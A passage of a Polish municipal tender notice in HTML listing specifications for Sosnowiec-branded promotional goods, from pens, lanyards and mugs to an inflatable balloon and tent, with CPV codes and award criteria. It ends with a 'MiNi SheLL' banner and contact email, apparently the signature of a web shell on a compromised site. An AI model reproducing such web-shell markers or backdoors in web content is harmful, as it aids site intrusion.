1. Pióro wieczne o jakości nie gorszej niż firmy Parker. Mosiężny korpus ze szczotkowanego metalu, w dotyku satynowy. Pokryty lakierem w kolorze szampana. Pióro wieczne wyposażone w stalówkę z wysokiej jakości nierdzewnej stali. Z pióra można korzystać z nabojów lub z tłoczka napełnianego atramentem. Uchwyt ze stali nierdzewnej oraz klips w formie strzały.
2. Pióro zapakowane w etui z tworzywa sztucznego lub kartonu. 
3. Wymiary pióra ok. 135x10mm
4. Zdobienie pióra: Grawer laserowy monochromatyczny logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku dostosowane do wielkości pióra. 
5. Gwarancja: międzynarodowa - 2 lata od dnia zakupu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Długopis plastikowy - 2.500 sztuk 
1. Długopis plastikowy koloru granatowego zbliżony do Pantone dla powlekanych 295C, nie transparentny, automatyczny z antystresowym wahadłowym mechanizmem.
2. Wymienny wkład koloru niebieskiego.
3. Zdobienie: Logo  Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy na korpusie, w jednym kolorze zgodnie z SIW i Księgą Znaku oraz adres strony: internetowej www.sosnowiec.pl na klipsie w jednym kolorze z SIW i Księgą Znaku,
4. Wymiary długopisu: ok. 140x20mm.
5. Wymiary logo (maksymalne): Długopis - 20x13mm.
6. Wymiary adresu strony (maksymalne): Klips - 33x4mm.
2. Długopis plastikowy - 2.500 sztuk
1. Długopis plastikowy koloru zielonego zbliżony do Pantone dla powlekanych 376C, nie transparentny, automatyczny z antystresowym wahadłowym mechanizmem.
2. Wymienny wkład koloru niebieskiego.
3. Zdobienie: Logo  Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy na korpusie, w jednym kolorze zgodnie z SIW i Księgą Znaku oraz adres strony: internetowej www.sosnowiec.pl na klipsie w jednym kolorze z SIW i Księgą Znaku,
4. Wymiary długopisu: ok. 140x20mm.
5. Wymiary logo (maksymalne): Długopis - 20x13mm.
6. Wymiary adresu strony (maksymalne): Klips - 33x4mm.
3.Długopis z gumką ułatwiającą korzystanie ze smart fonów i tabletów. 2.000 sztuk 
1. Długopis plastikowy koloru zielonego zbliżony do Pantone dla powlekanych 376C.  
2.  Mechanizm obrotowy. 
3. Wymienny wkład koloru niebieskiego.
4. Gumka ułatwiająca korzystanie ze smart fonów i tabletów.
5. Zdobienie: Logo  Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy na korpusie, w jednym kolorze zgodnie z SIW i Księgą Znaku. 
6. Wymiary długopisu ok. 136x7mm
4. Zestaw kredek(tuba) - 1.000 sztuk
1. Zestaw dwunastu drewnianych kolorowych kredek w kartonowej tubie. 
2. Wymiary: ok. 98x35x35mm.
3. W tubie powinno się znajdować12 drewnianych różnokolorowych, kredek.
4. Kredki zapakowane w tubę, górna część tuby w kształcie kredki jak na załączonej wizualizacji. 
5. Zdobienie Logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku jak na załączonym wzorze.
5. Brelok z żetonem - 2.000 sztuk
1. Brelok koloru niebieskiego transparentny  wraz z żetonem koloru białego.
2. Wymiary: przybliżone: w najszerszym miejscu ok. 35mm, wysokość ok. 58mm.
3. Zdobienie: Żeton: Logo Sosnowca z hasłem Sosnowiec łączy w dwóch kolorach po obu stronach. Brelok: Adres strony internetowej www.sosnowiec.pl w kolorze białym po obu stronach. Zgodnie z SIW oraz Księgą Znaku.
4. Kółko w kolorze srebrnym
6. Brelok mis odblaskowy - 3.000 sztuk
1. Brelok miś - odblaskowy z twardego odblaskowego plastiku. 
2. Surowiec: twardy odblaskowy plastik 
3. Wymiary:ok. 70x50x6mm 
4. Zdobienie: Logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy  w pełnym kolorze zgodnie z SIW i Księgą Znaku. 
5. Brelok wykończony łańcuszkiem oraz kółkiem.
7.Opaska odblaskowa - 3.000 sztuk
1. Samozaciskowa opaska odblaskowa na rękę lub ramię koloru zielonego Pantone dla powlekanych 376C, zgodnie z SIW i Księgą Znaku.
2. Budowa/Surowiec: blaszka samozaciskowa zalaminowana odblaskową folia pryzmatyczną, spód materiał typu flock łagodny dla dłoni (wewnątrz wyposażone dodatkowe warstwy folii pcv chroniące pryzmat przed zniszczeniem / przetarciem).
3. Wymiary: ok. 340x30mm.
4. Zdobienie: Logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy oraz adresem strony internetowej www.sosnowiec.pl w kolorze granatowym zgodnie z SIW i Księgą Znaku  jak na załączonym wzorze. 
5. Opaska wykończona welurem od strony przylegającej do ręki. 
8. Zapach do samochodu - 3.000 sztuk 
1. Zapach do samochodu o indywidualnym kształcie (logo) wykonany z kartonu.
2. Wielkość około: 80x60mm.
3. Grubość około 2mm.
4. kolor: 4+4.
5. Pakowanie indywidualny woreczek foliowy.
9. Smycz zielona - 2.500 sztuk
1. Smycz - Taśma w kolorze zielonym, 
2. Wymiary taśmy: 
a) długość taśmy: ok. 900 mm; 
b) szerokość taśmy: ok. 15 mm; 
c) grubość taśmy ok. 1 mm 
3. Zdobienie: metodą sublimacji, z nadrukiem logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy oraz adresem strony internetowej www.sosnowiec.plzgodnie z SIW i Księgą Znaku, po obu stronach.
4. Zakończona metalowym karabińczykiem w kolorze srebrnym oraz zapięciem na telefon dwuelementowym ze sznurkiem. 
5. UWAGI: 
b) Ilość logotypów oraz hasła Sosnowiec łączy na obu stronach po 11. 
c) Wielkość nadruku: ok. 40mm szerokości i 9 mm wysokości
10. Smycz granatowa - 2.500 sztuk
1. Smycz - Taśma w kolorze granatowym, 
2. Wymiary taśmy: 
a) długość taśmy: ok. 900 mm; 
b) szerokość taśmy: ok. 15 mm; 
c) grubość taśmy ok. 1 mm 
3. Zdobienie: metodą sublimacji, z nadrukiem logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy oraz adresem strony internetowej www.sosnowiec.pl zgodnie z SIW i Księgą Znaku, po obu stronach, 
4. Zakończona metalowym karabińczykiem w kolorze srebrnym oraz zapięciem na telefon dwuelementowym ze sznurkiem. 
5. UWAGI: 
b) Ilość logotypów oraz hasła Sosnowiec łączy na obu stronach po 11. 
c) Wielkość nadruku: ok. 40mm szerokości i 9 mm wysokości
11. Skrobaczka do szyb - 2.000 sztuk
1.Skrobaczka do szyb z trzema końcówkami - płaską, ząbkowaną oraz gumową. Wykonana z tworzywa nietransparentnego.
2. Wymiary skrobaczki: ok. 110x122x3mm
3. Zdobienie: logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIWZ i Księga Znaku w jednym kolorze.
4. Wielkość nadruku około 40x30mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kubek ceramiczny koloru białego - 1.000 sztuk
1. Biały kubek z porcelitu w kształcie walca, 
2. Wymiary: 
a) pojemność od 230 do 350 ml, 
b) wysokość: ok. 90 mm, 
c) średnica dołu : ok. 48 mm, 
d) Średnica góra: 78mm 
3. Surowiec: porcelit, 
4. Zdobienie: nadruk dookoła kubka z wyłączeniem ucha, z logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy o wymiarach ok. 55x35mm zgodnie z Księgą Znaku i SIW, 
5. Każdy kubek zapakowany w białe kartonowe pudełko. 
2. Kubek termiczny - 50 sztuk
1. Kubek termiczny z plastikową pokrywką. -kolor: czarny.
2. Kubek termiczny wykonany ze stali nierdzewnej z kolorową transparentna obudową. 
3. Wewnątrz kubka stal o podwyższonej jakości. 
4. Pojemność 300 ml. 
5. Wymiary produktu ok. 85x120mm
6. Plastikowy uchwyt do trzymania. 
7.Technika zdobienia Tampondruk po jednej stronie Logo miasta wraz z napisem Sosnowiec łączy zgodnie z SIW i Księgą Znaku w jednym kolorze po drugiej stronie grafika zaproponowana przez Zamawiającego. 
8. Wielkość zdobienia po obu stronach około 30x30mm
9. Kubek pakowany w kartonowe pudełko..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Leżak - 100 sztuk
1. Leżak bez podłokietnika z nadrukiem po obu stronach materiału 
1 kolor, wielkość nadruku na całości materiału wg. Załączonego wzoru. 
2. Leżak wykonany z drewna twardego (bukowego) bezsęcznego pierwszej klasy. 
3. Leżak wyposażony w plastikowe zabezpieczenia zapobiegające przed samoczynnym złożeniem się.
4. Wymiary leżaka około 122cm(wysokość)x58cm(szerokość)x3,3cm(grubość) 
5. Materiał: poliester wodoodporny gramatura 240 g
6. Tkanina przeszyta podwójnie mocnymi nićmi.
7. Kolor leżaka granatowy. 
8. Leżaki wykonane zgodnie z normami  PN-EN 581-1 oraz 581-2 i dopuszczone do użytku publicznego
9. Gwarancja 12 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Balon pneumatyczny 6m wysokości
1. Materiał :poliester powlekany trudnopalny, wodoodporny o gramaturze nie mniejszej niż 399gr/m2 (certyfikaty)
2. Nadruk: 
a) grafika wykonana metodą solwentu zgodnie z kolorystyka zamawiającego, Druki dodatkowo laminowane zabezpieczone przed zniszczeniem i odporny na UV. 
3. Wentylator :
a) stopień ochronyIP44 i klasie izolacji B
b) prędkość obrotowa2100obr/min.
c) pobór mocy 260W / 230V , 1,18A
d) wydajność 600m3/h
e) ciśnienie statyczne580Pa
f) poziom ciśnienia akustycznego71dB
4. Oświetlenie wewnętrzne 
a) osłona wykonana z poliwęglanu transparentnego(temperatura pracy-50oCdo+120oC,wysoka udarność i twardość , trudnopalność )
b) żarówka energooszczędna 23W
c) strumień świetlny 1400Lm
d) Przewód OMY 2x1,5
e) max temp.60oC
5. Zestaw odciągów:
a) linki wykonane z jedwabiu polipropylenowego charakteryzują się niewielkim ciężarem właściwym , który wynosi0,91cm
b) inki te nie toną w wodzie oraz jedynie powierzchniowo ją chłoną ( mała higroskopijność włókien )
c) nie zmieniają wymiarów i twardości pod wpływem warunków atmosferycznych , są trwałe do temp.100oC, a temp. topnienia wynosi 165oC 
d) charakteryzują się odpornością na ścieranie oraz bardzo dobrą odpornością na działanie kwasów, soli i zasad.
e) są odporne na działanie promieni UV
6. Śledzie:
a) cynkowane śledzie o długości 35cm. 
7. Pokrowiec transportowy:
a) wykonany z trwałych materiałów , dno usztywnione , rączki do przenoszenia z dodatkowym usztywnieniem, wyposażony w okienko do włożenia listów identyfikacyjnych. 
8.Instrukcja obsługi w jęz. polskim
9. Gwarancja 12 miesięcy. 
2. Namiot pneumatyczny  o 4 nogach
1.Materiał: poliester powlekany PCV; trudnopalny, wodoodporny o gramaturze nie mniejszej niż 399gr/m2 (certyfikat).
2. Ścianki namiotu ścianki odpinane, na zamkach spiralnych.
3. Wymiary namiotu: 4x4m, powierzchnia użytkowa 16 mkwadratowych;
4. Odciągi na wszystkich nogach.
5. Nadruk:
a) grafika wykonana metodą solwentu zgodnie z kolorystyką zamawiającego, druk dodatkowo laminowany - zabezpieczony przed zniszczeniem i odpornym na promienie UV.
6. Wentylator:
a) stopień ochrony IP44 i klasie izolacji B.
b) prędkość obrotowa 2100obr/min.
c) pobór mocy 260W/230V, 1,18A.
d) wydajność 600m3/h.
e) Ciśnienie statyczne 580Pa.
f) poziom ciśnienia akustycznego 71dB.
7. Oświetlenie wewnętrzne:
a) osłona wykonana z poliwęglanu transparentnego (temperatura pracy -50°C do +120°C, wysoka udarność, twardość i trudnopalność);
b) żarówka energooszczędna 23W.
c) strumień świetlny 1400Lm.
d) Przewód OMY 2x1,5
-max temp 60°C.
8. Zestaw odciągów:
a) linki wykonane z jedwabiu polipropylenowego, charakteryzujące się niewielkim ciężarem właściwym - wynoszącym 0,91ccm.
b) linki nie tonące w wodzie, chłonące tylko powierzchniowo (mała higroskopijność włókien).
Nie zmieniające się wymiary i twardość pod wpływem warunków atmosferycznych, trwałe do 100°C, a temp. Topnienia wynosi 165°C.
c) Charakteryzujące się odpornością na ścieranie oraz bardzo dobrą odpornością na działanie kwasów, soli i zasad.
d)  odporne na działanie promieni UV.
9.Śledzie:
a) cynkowane śledzie o długości 35cm.
10. Pokrowiec transportowy:
a) wykonany z trwałych materiałów, dno usztywnione, rączki do przenoszenia z dodatkowym usztywnieniem, wyposażony w okienko do włożenia listów identyfikacyjnych.
11. Instrukcja obsługi w języku polskim.
12.  Gwarancja 12 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com